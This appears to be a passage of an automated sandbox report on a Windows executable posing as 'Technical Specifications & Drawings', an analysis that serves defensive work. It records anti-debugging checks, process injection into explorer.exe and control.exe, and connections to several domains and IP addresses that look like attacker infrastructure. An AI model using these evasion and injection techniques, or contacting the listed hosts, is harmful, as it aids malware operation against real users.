          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01878CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01826CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018614FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01861C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01826C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0187740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0183C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01827794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017BFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017BEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0187070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0183FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01878F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0183FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01870EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018246A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0185FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01878ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017AE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017AC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01861608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0185FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0186AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\control.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\explorer.exeNetwork Connect: 109.234.162.62 80
          Source: C:\Windows\explorer.exeDomain query: www.mexc-event-partner.site
          Source: C:\Windows\explorer.exeDomain query: www.gzkanglongkeji.com
          Source: C:\Windows\explorer.exeNetwork Connect: 107.155.208.43 80
          Source: C:\Windows\explorer.exeNetwork Connect: 184.168.107.80 80
          Source: C:\Windows\explorer.exeNetwork Connect: 67.23.226.119 80
          Source: C:\Windows\explorer.exeDomain query: www.kirchhoff-darryl.com
          Source: C:\Windows\explorer.exeNetwork Connect: 67.223.117.72 80
          Source: C:\Windows\explorer.exeDomain query: www.boshi-eg.online
          Source: C:\Windows\explorer.exeDomain query: www.tomoptique.fr
          Source: C:\Windows\explorer.exeDomain query: www.esandcraic.com
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeSection unmapped: C:\Windows\SysWOW64\control.exe base address: 1C0000
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeMemory written: C:\Users\user\Desktop\Technical Specifications & Drawings.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeThread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeThread register set: target process: 3968
          Source: C:\Windows\SysWOW64\control.exeThread register set: target process: 3968
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess created: C:\Users\user\Desktop\Technical Specifications & Drawings.exe C:\Users\user\Desktop\Technical Specifications & Drawings.exe
          Source: explorer.exe, 00000005.00000000.320653170.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.265661607.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.365897983.0000000000688000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanEXE^
          Source: explorer.exe, 00000005.00000000.329795271.00000000080ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.302606541.0000000005920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.321297166.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.321297166.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.366589864.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.298681705.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.321297166.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.366589864.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.298681705.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000005.00000000.297954102.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.365954080.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.265765381.000000000069D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd4
          Source: explorer.exe, 00000005.00000000.321297166.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.366589864.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.298681705.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: WProgram Manager
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Users\user\Desktop\Technical Specifications & Drawings.exe VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
